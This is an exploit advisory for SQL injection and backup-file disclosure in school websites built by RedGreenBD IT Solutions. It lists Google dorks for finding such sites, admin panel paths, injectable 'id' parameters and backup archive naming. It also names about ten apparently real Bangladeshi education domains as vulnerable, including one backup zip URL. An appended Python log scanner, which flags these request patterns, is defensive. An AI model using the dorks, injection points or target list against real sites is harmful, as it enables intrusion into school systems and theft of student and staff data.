RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure

2019.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################################################################

# Exploit Title : RedGreenBD IT Solutions SQL Injection - Backup and File Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/01/2019
# Vendor Homepage : redgreenbd.com
# Vendor Version : PHP 5.4.45 - LiteSpeed Server - jQuery 1.3.2
# Software Download Link : N/A
# Software : Priced => See Here => redgreenbd.com/pd.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks : intext:''Design & Developed by : RedGreenBD IT Solutions''
intext:''Designed by RedGreenBD IT Solutions''
intext:''Developed by RedGreenBD ITS"
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200: Information Exposure
CWE-538: File and Directory Information Exposure
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-redgreenbd-it-solutions-multiple-vulnerabilities.html

###################################################################

# Admin Panel Login Path / Student-Teacher-Guardian Panel Path =>
***********************************************************
/index.php?q=login-form
/?q=login
/?q=student-login
/wadmin

# SQL Injection Exploit :
**********************
/?q=newsDetail&id=[SQL Injection]
/?q=news-detail&id=[SQL Injection]
/?q=notice-detail&id=[SQL Injection]
/?q=page-detail&id=[SQL Injection]
/?q=home-block&id=[SQL Injection]
/index.php?q=news-detail&id=[SQL Injection]

# Backup Disclosure Exploit [ Example ] =>
***************************************
Look at this /uploads/ folder for backup files.

/uploads/uploads_backup_[DAY]_[MONTH]_[YEAR].zip
/uploads/uploads_backup_18_12_18.zip
/uploads/uploads_backup_21_11_18.zip

# Arbitrary File Disclosure =>
**************************
Look at this folder.

/uploads/....
/uploads/booklist/ => PDF Files here
/uploads/mnews/ => PDF Files here
/uploads/result/ => PDF Files here
/uploads/routine3/ => PDF Files here
/uploads/syllabus/ => PDF Files here

###################################################################

# Example Vulnerable Sites =>

Note => Bangladesh Education Sites are vulnerable for this security issue.

(104.152.168.23) => There are 899 domains hosted on this server.

[+] dhankhalimuss.edu.bd/?q=newsDetail&id=13%27 => + Proof of Concept for SQL Injection => archive.vn/EJDgW
[+] cmpi.edu.bd/?q=newsDetail&id=13%27
[+] panchjuniadss.edu.bd/?q=newsDetail&id=13%27
[+] ths.edu.bd/?q=newsDetail&id=13%27
[+] rmss.edu.bd/?q=newsDetail&id=13%27
[+] pakhimarapvss.edu.bd/?q=notice-detail&id=3%27
[+] tsbghs.edu.bd/?q=page-detail&id=3%27
[+] nipi.edu.bd/?q=newsDetail&id=13%27
[+] cppi.edu.bd/?q=newsDetail&id=13%27
[+] bsidhaka.edu.bd/?q=newsDetail&id=13%27
[+] bsidhaka.edu.bd/uploads/uploads_backup_21_11_18.zip

###################################################################

# SQL Database Error :

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13''' at line 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
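For operators of an affected site, the following added example (not part of the original advisory or the vendor's code) reviews web access logs for the two request shapes described above: a non-integer id on the listed detail routes, and downloads of /uploads/uploads_backup_*.zip archives. It assumes Combined Log Format; the function names classify and scan and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Routes the advisory lists as taking an `id` parameter that reaches SQL.
DETAIL_ROUTES = {"newsDetail", "news-detail", "notice-detail", "page-detail", "home-block"}
# Backup naming scheme from the advisory: uploads_backup_[DAY]_[MONTH]_[YEAR].zip
BACKUP_RE = re.compile(r"^/uploads/uploads_backup_\d{1,2}_\d{1,2}_\d{2,4}\.zip$", re.I)
# Assumption: Combined Log Format, i.e. "METHOD target HTTP/x.y" followed by the status.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2019:10:00:01 +0000] "GET /?q=newsDetail&id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jan/2019:10:00:05 +0000] "GET /?q=newsDetail&id=13%27 HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.9 - - [05/Jan/2019:10:00:09 +0000] "GET /uploads/uploads_backup_21_11_18.zip HTTP/1.1" 200 88211043 "-" "Mozilla/5.0"
198.51.100.4 - - [05/Jan/2019:10:01:00 +0000] "GET /uploads/syllabus/class9.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return (finding, status) for one access-log line, or None if nothing to review."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    status = int(m.group(2))
    if BACKUP_RE.match(parts.path):
        return ("backup-download", status)
    qs = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
    if qs.get("q", [""])[0] in DETAIL_ROUTES:
        # A legitimate id is a plain ASCII integer; anything else needs review.
        if any(not re.fullmatch(r"[0-9]+", v) for v in qs.get("id", [])):
            return ("non-numeric-id", status)
    return None

def scan(log_text):
    """Return [(line_number, finding, status), ...] for every flagged line."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = classify(line)
        if hit:
            findings.append((n, *hit))
    return findings

if __name__ == "__main__":
    for n, kind, status in scan(SAMPLE_LOG):
        print(f"line {n}: {kind} (HTTP {status})")
```

A backup-download finding with status 200 means the archive was actually served and its contents should be treated as disclosed.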



Copyright 2019, cxsecurity.com

 
